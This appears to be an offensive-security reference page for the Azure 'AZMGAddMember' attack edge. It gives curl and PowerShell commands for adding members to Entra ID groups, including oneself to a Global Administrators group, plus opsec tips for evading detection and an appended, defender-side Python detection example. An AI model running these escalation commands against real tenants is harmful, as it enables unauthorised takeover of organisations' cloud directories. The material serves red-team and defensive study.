AZMGAddMember

The source service principal has been granted an MS Graph app role that allows it to add members to groups (GroupMember.ReadWrite.All or equivalent), enabling group membership manipulation via the MS Graph API.

Applies to: AZServicePrincipal → AZGroup (via MS Graph API)

Linux Abuse

Get client credentials token

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

Add principal to group (Graph API)

curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Add to role-assignable group (requires RoleManagement.ReadWrite.Directory)

# Same endpoint; succeeds against a role-assignable group only if the SP also holds RoleManagement.ReadWrite.Directory
curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Windows Abuse

BARK: get token and add member

$MGToken = Get-MSGraphTokenWithClientCredentials `
  -ClientID "34c7f844-b6d7-47f3-b1b8-720e0ecba49c" `
  -ClientSecret "asdf..." `
  -TenantName "contoso.onmicrosoft.com"

Add-AZMemberToGroup `
  -PrincipalID "<object-id>" `
  -TargetGroupId "<target-group-id>" `
  -Token $MGToken.access_token

Microsoft.Graph PowerShell

# Microsoft.Graph SDK 2.x expects -AccessToken as a SecureString (1.x accepted a plain string)
Connect-MgGraph -AccessToken (ConvertTo-SecureString "<access-token>" -AsPlainText -Force)
New-MgGroupMember -GroupId <target-group-id> -DirectoryObjectId <object-id>

Add self to Global Admin group (if role-assignable group exists)

# Find Global Administrators role-assignable group
$group = Get-MgGroup -Filter "isAssignableToRole eq true and displayName eq 'Global Administrators'"
New-MgGroupMember -GroupId $group.Id -DirectoryObjectId <object-id>

Required App Roles (MS Graph)

Permission                                                      App Role ID
GroupMember.ReadWrite.All                                       dbaae8cf-10b5-4b86-a4a1-f871c94c6695
Group.ReadWrite.All                                             62a82d76-70ea-41e2-9197-370581804d09
Directory.ReadWrite.All                                         19dbc75e-c2e2-444c-a770-ec69d8559fc7
RoleManagement.ReadWrite.Directory (role-assignable groups)     9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8

Opsec

  • Entra ID audit log records: actor SP, target group, added principal, timestamp.
  • This capability is not visible in the Azure Portal; finding it requires checking audit logs or API inspection.
  • Adding self to a privileged group is high-signal; prefer adding to an intermediate group.
  • client_credentials token acquisition does not generate interactive sign-in events.
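Defender-side triage of this edge, as an added example that is not part of the original page: the first function maps app role assignments to the App Role IDs in the table above to enumerate which service principals hold AZMGAddMember (and which can also reach role-assignable groups), and the second flags "Add member to group" audit events initiated by an app rather than a user, as the Opsec section describes. The sample records are constructed and use a simplified form of the MS Graph appRoleAssignments and directoryAudits shapes.

```python
# Added example, not the page's own code; sample data is constructed (simplified Graph shapes).
ADD_MEMBER_APP_ROLES = {  # app role IDs from the table above
    "dbaae8cf-10b5-4b86-a4a1-f871c94c6695": "GroupMember.ReadWrite.All",
    "62a82d76-70ea-41e2-9197-370581804d09": "Group.ReadWrite.All",
    "19dbc75e-c2e2-444c-a770-ec69d8559fc7": "Directory.ReadWrite.All",
}
ROLE_MGMT_APP_ROLE = "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"  # RoleManagement.ReadWrite.Directory

def principals_with_add_member(assignments):
    """{principalId: {"perms": [...], "role_assignable": bool}} for SPs that hold the edge."""
    out = {}
    for a in assignments:
        perm = ADD_MEMBER_APP_ROLES.get(a["appRoleId"])
        if perm:
            out.setdefault(a["principalId"], {"perms": [], "role_assignable": False})["perms"].append(perm)
    for a in assignments:  # RoleManagement alone is not the edge; it extends one to role-assignable groups
        if a["appRoleId"] == ROLE_MGMT_APP_ROLE and a["principalId"] in out:
            out[a["principalId"]]["role_assignable"] = True
    return out

def flag_sp_group_adds(audit_events, role_assignable_group_ids):
    """Flag 'Add member to group' audit events initiated by an app rather than a user
    (client_credentials leaves no interactive sign-in, so this log is the trail)."""
    findings = []
    for ev in audit_events:
        app = (ev.get("initiatedBy") or {}).get("app")
        if ev.get("activityDisplayName") != "Add member to group" or not app:
            continue
        group = next((t for t in ev["targetResources"] if t["type"] == "Group"), None)
        member = next((t for t in ev["targetResources"] if t["type"] != "Group"), None)
        if not group or not member:
            continue
        high = group["id"] in role_assignable_group_ids or member["id"] == app["servicePrincipalId"]
        findings.append({"time": ev["activityDateTime"], "actor": app["servicePrincipalId"],
                         "group": group["id"], "member": member["id"],
                         "severity": "high" if high else "medium"})
    return findings

ASSIGNMENTS = [  # constructed appRoleAssignments
    {"principalId": "sp-1", "appRoleId": "dbaae8cf-10b5-4b86-a4a1-f871c94c6695"},
    {"principalId": "sp-1", "appRoleId": "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"},
    {"principalId": "sp-2", "appRoleId": "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"},
]
AUDIT_EVENTS = [  # constructed: sp-1 adds itself to a role-assignable group
    {"activityDateTime": "2024-05-01T10:00:00Z", "activityDisplayName": "Add member to group",
     "initiatedBy": {"app": {"servicePrincipalId": "sp-1"}, "user": None},
     "targetResources": [{"id": "sp-1", "type": "ServicePrincipal"}, {"id": "grp-ga", "type": "Group"}]},
]
FINDINGS = flag_sp_group_adds(AUDIT_EVENTS, {"grp-ga"})  # one high-severity finding for sp-1
```

Role-assignable group IDs for the second function can be collected with the same isAssignableToRole filter shown in the Microsoft.Graph section above.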